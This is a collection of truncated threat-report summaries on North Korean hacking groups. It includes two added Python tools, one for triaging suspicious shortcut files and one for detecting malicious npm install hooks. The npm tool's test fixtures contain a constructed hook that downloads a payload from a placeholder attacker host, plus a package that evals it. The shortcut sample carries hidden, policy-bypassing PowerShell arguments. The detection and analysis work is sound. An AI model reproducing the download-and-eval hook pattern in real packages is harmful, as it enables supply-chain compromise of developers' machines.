AhnLab reports that the North Korea-linked Kimsuky group abused Chrome Remote Desktop to maintain GUI control of infected Windows systems after deploying its AppleSeed backdoor. The observed chain used WSF or JavaScript malware that decoded AppleSeed with…
360 Advanced Threat Research Institute attributes a campaign using fake ComcastVNC software to APT-C-26/Lazarus with medium confidence, based on alignment with previously reported Lazarus TightVNC and sRDI/BlindingCan tradecraft. The initial archive/ISO d…
ESTsecurity’s ESRC reports a Kimsuky campaign distributing malware disguised as a legitimate “Mail Online Security” installer, assessed as a variant of activity previously warned about by South Korea’s NCSC/KISA. The lure used an ISO containing setup.exe …
The Korean source analyzes a Kimsuky-linked LNK malware sample named “Pipelines Profile,” describing the actor’s use of link-file delivery as macro-based Office attacks became less effective. The oversized LNK launches hidden PowerShell, extracts an embed…
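The traits described above (an oversized .lnk whose real target is a hidden PowerShell window, with a payload carried inside the shortcut itself) can be triaged statically without running the file. The following is an added example, not code from the Korean source: it parses the ShellLinkHeader and StringData fields of a Shell Link file per the MS-SHLLINK layout, walks the ExtraData blocks to find the TerminalBlock, and reports anything appended after it as an overlay. The sample shortcut it builds is constructed for the example (the "Pipelines Profile.pdf" display name, the relative path, the argument string and the 200 000-byte padding are all invented), and the 64 KiB size threshold is a heuristic, not a figure from the report.

```python
"""Static triage of a Windows Shell Link (.lnk) file.

Added example: parses the ShellLinkHeader and StringData per MS-SHLLINK,
walks the ExtraData blocks, and flags a PowerShell target, a hidden window,
an oversized file and data appended after the TerminalBlock.
"""
import re
import struct

LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-0000-0000-C000-000000000046}
HAS_LINK_TARGET_ID_LIST, HAS_LINK_INFO = 0x01, 0x02
HAS_NAME, HAS_RELATIVE_PATH, HAS_WORKING_DIR = 0x04, 0x08, 0x10
HAS_ARGUMENTS, HAS_ICON_LOCATION, IS_UNICODE = 0x20, 0x40, 0x80
SW_SHOWMINNOACTIVE = 7        # ShowCommand value that keeps the console window out of sight
SIZE_THRESHOLD = 64 * 1024    # heuristic (assumption): ordinary shortcuts are a few KB
STRING_FIELDS = ((HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"),
                 (HAS_WORKING_DIR, "working_dir"), (HAS_ARGUMENTS, "arguments"),
                 (HAS_ICON_LOCATION, "icon_location"))


def parse_lnk(data: bytes) -> dict:
    """Return header fields, StringData strings and the size of any overlay."""
    header_size, clsid, flags = struct.unpack_from("<I16sI", data, 0)
    if header_size != 0x4C or clsid != LNK_CLSID:
        raise ValueError("not a Shell Link file")
    show_cmd = struct.unpack_from("<I", data, 60)[0]   # ShowCommand sits at offset 60
    pos = 0x4C
    if flags & HAS_LINK_TARGET_ID_LIST:                # IDListSize (2 bytes) + IDList
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:                          # LinkInfoSize includes itself
        pos += struct.unpack_from("<I", data, pos)[0]
    info = {"flags": flags, "show_command": show_cmd, "size": len(data)}
    for bit, name in STRING_FIELDS:                    # CountCharacters + chars, no terminator
        if not flags & bit:
            continue
        count = struct.unpack_from("<H", data, pos)[0]
        pos += 2
        width = 2 if flags & IS_UNICODE else 1
        raw = data[pos:pos + count * width]
        info[name] = raw.decode("utf-16-le" if width == 2 else "cp1252", "replace")
        pos += count * width
    while pos + 4 <= len(data):                        # ExtraData: blocks end with BlockSize < 4
        block_size = struct.unpack_from("<I", data, pos)[0]
        pos += 4 if block_size < 4 else block_size
        if block_size < 4:
            break
    info["overlay_bytes"] = len(data) - pos            # bytes after the TerminalBlock
    return info


def triage_lnk(data: bytes) -> dict:
    """Parse and attach a list of human-readable findings."""
    info = parse_lnk(data)
    findings = []
    target = (info.get("relative_path", "") + " " + info.get("arguments", "")).lower()
    args = info.get("arguments", "").lower()
    if re.search(r"powershell|pwsh", target):
        findings.append("launches powershell")
    if re.search(r"-w(?:indowstyle)?\s+h(?:idden)?\b", args):
        findings.append("hidden window flag in arguments")
    if re.search(r"-e(?:nc|ncodedcommand)?\b", args):
        findings.append("encoded command in arguments")
    if info["show_command"] == SW_SHOWMINNOACTIVE:
        findings.append("ShowCommand=7 (SW_SHOWMINNOACTIVE)")
    if info["size"] > SIZE_THRESHOLD:
        findings.append("oversized file")
    if info["overlay_bytes"] > SIZE_THRESHOLD:
        findings.append("large overlay after TerminalBlock")
    info["findings"] = findings
    return info


def build_sample_lnk(target: str, arguments: str, overlay: bytes, show_cmd: int) -> bytes:
    """Constructed test input (not a real sample): header + StringData + TerminalBlock + overlay."""
    flags = HAS_NAME | HAS_RELATIVE_PATH | HAS_WORKING_DIR | HAS_ARGUMENTS | IS_UNICODE
    header = struct.pack("<I16sIIQQQIIIHHII", 0x4C, LNK_CLSID, flags, 0x20,
                         0, 0, 0, 0, 0, show_cmd, 0, 0, 0, 0)
    enc = lambda s: struct.pack("<H", len(s)) + s.encode("utf-16-le")
    strings = enc("Pipelines Profile.pdf") + enc(target) + enc("C:\\Windows\\System32") + enc(arguments)
    return header + strings + struct.pack("<I", 0) + overlay


if __name__ == "__main__":
    sample = build_sample_lnk(
        "..\\..\\..\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
        "-windowstyle hidden -nop -ep bypass -c placeholder",   # invented argument string
        b"\x00" * 200_000, SW_SHOWMINNOACTIVE)
    for line in triage_lnk(sample)["findings"]:
        print(line)
```

The parser deliberately skips the LinkTargetIDList and LinkInfo structures by their declared sizes rather than interpreting them, because the command line and relative path in StringData are what matter for triage; a production tool would also decode the IDList target and cross-check it against the display name.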
Phylum observed a coordinated npm supply-chain campaign in which malicious packages were published in pairs that had to run sequentially on the same host. The first package used a preinstall hook to install sync-request, contact an attacker server, and wr…
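A defender reviewing a dependency tree for this pattern needs two things: a view of what each package's install-time lifecycle hooks actually do, and a way to spot packages that only make sense together. The following is an added example, not Phylum's tooling: it reads each package's package.json, follows a hook such as "node setup.js" into the referenced file, classifies the hook with a few regex heuristics (an npm install nested inside a hook, an HTTP client, file reads and writes, code execution), and then pairs a package whose hook writes a path with a package whose hook reads the same path. The three sample packages, their names, the attacker.invalid host and the /tmp/.cache-stage path are all constructed for the example, and the regex patterns are an assumption about what is worth flagging, not a complete detection.

```python
"""Added example (not Phylum's tooling): scan unpacked npm packages for
install-time lifecycle hooks, classify what each hook and the script it
invokes do, and correlate packages that pass data through a shared file."""
import json
import re

INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare")
# Heuristic patterns (assumption): enough for the example, not a full ruleset.
PATTERNS = {
    "nested npm install in hook": re.compile(r"\bnpm\s+(?:i|install)\b"),
    "http client": re.compile(r"\b(?:sync-request|https?\.request|fetch|axios|curl|wget)\b"),
    "file write": re.compile(r"\bwriteFileSync?\b"),
    "file read": re.compile(r"\breadFileSync?\b"),
    "code execution": re.compile(r"\b(?:eval|child_process|execSync|spawn)\b"),
}
PATH_RE = re.compile(r"""['"]((?:/|[A-Za-z]:\\|~)[^'"]+)['"]""")  # absolute-looking string literals
NODE_SCRIPT_RE = re.compile(r"\bnode\s+(\S+\.[cm]?js)\b")


def scan_package(files: dict) -> dict:
    """files maps file name to content for one unpacked package."""
    pkg = json.loads(files["package.json"])
    findings, paths, hooks = set(), set(), {}
    for hook in INSTALL_HOOKS:
        cmd = pkg.get("scripts", {}).get(hook)
        if not cmd:
            continue
        hooks[hook] = cmd
        texts = [cmd]
        for script in NODE_SCRIPT_RE.findall(cmd):   # follow `node foo.js` into the package
            if script in files:
                texts.append(files[script])
        for text in texts:
            findings.update(f"{hook}: {label}" for label, rx in PATTERNS.items() if rx.search(text))
            paths.update(PATH_RE.findall(text))
    return {"name": pkg["name"], "hooks": hooks, "findings": sorted(findings), "paths": paths}


def find_pairs(reports: list) -> list:
    """Writer/reader pairs: one package's hook writes a path that another's hook reads."""
    pairs = []
    for writer in reports:
        if not any(f.endswith("file write") for f in writer["findings"]):
            continue
        for reader in reports:
            if reader is writer or not any(f.endswith("file read") for f in reader["findings"]):
                continue
            shared = sorted(writer["paths"] & reader["paths"])
            if shared:
                pairs.append((writer["name"], reader["name"], shared))
    return pairs


# Constructed sample packages: names, host and paths are invented for this example.
SAMPLE_PACKAGES = [
    {"package.json": '{"name": "stage-one-example", "version": "1.0.0", '
                     '"scripts": {"preinstall": "npm install sync-request && node setup.js"}}',
     "setup.js": "const fs = require('fs');\n"
                 "const res = require('sync-request')('GET', 'http://attacker.invalid/payload');\n"
                 "fs.writeFileSync('/tmp/.cache-stage', res.getBody());\n"},
    {"package.json": '{"name": "stage-two-example", "version": "1.0.0", '
                     '"scripts": {"postinstall": "node run.js"}}',
     "run.js": "const fs = require('fs');\n"
               "eval(fs.readFileSync('/tmp/.cache-stage', 'utf8'));\n"},
    {"package.json": '{"name": "clean-lib-example", "version": "2.1.0", "scripts": {"test": "mocha"}}'},
]

if __name__ == "__main__":
    reports = [scan_package(p) for p in SAMPLE_PACKAGES]
    for r in reports:
        print(r["name"], r["findings"] or "no install-time findings")
    for writer, reader, shared in find_pairs(reports):
        print(f"pair: {writer} writes {shared}, {reader} reads it")
```

The pairing step is the part worth keeping: an individual stage may look like an ordinary build script, and only the shared path between the writer's preinstall and the reader's postinstall shows that the two packages were meant to run in sequence on one host.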
Considering that the words used in the malware and the executed script code are similar to those of previously analyzed code, it is suspected that the same threat group (Kimsuky) is also the creator of this malware. Both the script present in the above UR…
The SBS segment explains how DPRK cyber theft helps fund weapons and missile programs, citing US and South Korean statements that cyber operations provide a major share of regime revenue. It discusses named North Korean hackers charged by the US, cryptocu…
Kimsuky is the most common threat group, followed by Lazarus Group and APT37. South Korea and the United States are the most common targets, but North Korean threat actors have a global reach, targeting entities in at least 29 countries. Despite its centr…
North Korean hackers are described as financially motivated operators who moved from high-profile disruption, including Sony and WannaCry, into large-scale theft from banks and cryptocurrency businesses. The WSJ transcript cites Chainalysis estimates that…
TRM Labs frames North Korean cryptocurrency theft as a growing revenue stream that has expanded as sanctions, border closures, and weakened traditional income channels increased pressure on the regime. The excerpt highlights attacks on cryptocurrency busi…
Elastic analyzed a REF9134 intrusion at a prominent Japanese cryptocurrency exchange where an adversary used JOKERSPY components on macOS systems. The activity involved the self-signed Swift binary xcc, which checked permissions such as Full Disk Access, …
NSHC ThreatRecon’s April 2023 monthly intelligence report identifies SectorA activity as the most prominent threat-actor grouping in the period, with five SectorA clusters observed across South Korea and other regions. The DPRK-relevant section describes …
ASEC attributed a May 2023 campaign to RedEyes/APT37, also known as ScarCruft/Reaper, targeting individuals such as North Korean defectors, human-rights activists, and university professors. The intrusion used spear-phishing attachments that paired a norm…
While the Kimsuky group has often used document files for malware distribution, there have been many recent cases where CHM files were used instead. Recently, there has been an increase in malware distribution targeting particular users using personal…
The team has researched various potential causes, the most probable of which are virus targeting of local users' devices, infrastructure breach, malware code injection, or a man-in-the-middle attack. We've engaged with the leading Crypto Investigators - Ch…